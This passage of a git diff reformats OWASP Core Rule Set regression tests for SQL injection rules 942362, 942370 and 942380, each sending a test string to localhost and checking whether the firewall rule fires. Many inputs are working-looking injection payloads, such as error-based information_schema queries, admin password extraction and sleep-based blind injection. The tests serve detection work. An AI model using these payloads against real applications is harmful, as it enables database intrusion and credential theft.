127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 28 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "6 As\" from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "6 As\" from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 29 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as day1 FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as day1 FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 30 desc: GH issue 1580 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ", aside from" - version: HTTP/1.0 - output: - no_log_contains: id "942362" - - test_title: 942362-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ", aside from" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942362] + - test_id: 31 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/create" - version: HTTP/1.0 - output: - no_log_contains: id "942362" - - test_title: 942362-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/create" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942362] + - test_id: 32 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/CREATE TABLE Persons" - version: HTTP/1.0 - output: - log_contains: id "942362" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml index a071e20..18ba3f0 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml @@ -7,10 +7,9 @@ meta: WARNING: these tests were derived from the existing expressions and are semantically meaningless. The tests were used to ensure that a change to the assembly file would not change the semantics. If you know what a particular expression is supposed to catch, please revise the associated test. - enabled: true - name: 942370.yaml +rule_id: 942370 tests: - - test_title: 942370-1 + - test_id: 1 desc: | [\"'`]\s*?\*.+or\W*?[\"'`]\d [\"'`]\s*?\*.+xor\W*?[\"'`]\d @@ -19,93 +18,93 @@ tests: [\"'`]\s*?\*.+between\W*?[\"'`]\d [\"'`]\s*?\*.+and\W*?[\"'`]\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' * from = 1 or '9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' * from = 1 or '9" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 2 desc: | [\"'`]\s*?\*.+id\W*?[\"'`]\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' * from = 1 id '9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' * from = 1 id '9" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 3 desc: | [^\w\s?]+\s*?[^\w\s]+\s*?[\"'`"] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' = # '" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' = # '" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 4 desc: | [^\w\s]+\s*?[\W\d].*?# stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' ? # = #" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' ? # = #" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 5 desc: | [^\w\s]+\s*?[\W\d].*?-- stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='? # = --" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='? # = --" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 6 desc: | [\"'`]\s*?or\s[^\d]+[\w-]+.*?\d [\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d @@ -114,102 +113,102 @@ tests: [\"'`]\s*?between\s[^\d]+[\w-]+.*?\d [\"'`]\s*?and\s[^\d]+[\w-]+.*?\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' or homer 9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' or homer 9" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 7 desc: | \^[\"'`] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=^'" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=^'" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 8 desc: | [\"'`].*?\*\s*?\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"` * 12344" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"` * 12344" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 9 desc: | [()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=>foo##'." - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=>foo##'." + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 10 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")# - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")# + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 11 desc: encode(lo_get(16400),'base64')::int stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode(lo_get(16400),'base64')::int - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16400),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml index d229d33..c3445da 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml @@ -1,772 +1,770 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942380.yaml +rule_id: 942380 tests: - - test_title: 942380-1 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from `db_miwf`.`sys_refindex` limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-2 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-3 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-4 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ORder by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-5 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ordeR by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-6 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-7 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-8 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-9 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-10 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-11 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-12 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-13 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-14 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT 'qzxjq'||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-15 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute php" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-16 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-17 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Execute(" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-18 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-19 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-20 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-21 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-22 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "HAVING+1%3D" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-23 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute+elysi" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-24 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-25 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-26 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-27 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-28 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-29 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-30 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-31 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute node_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-32 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 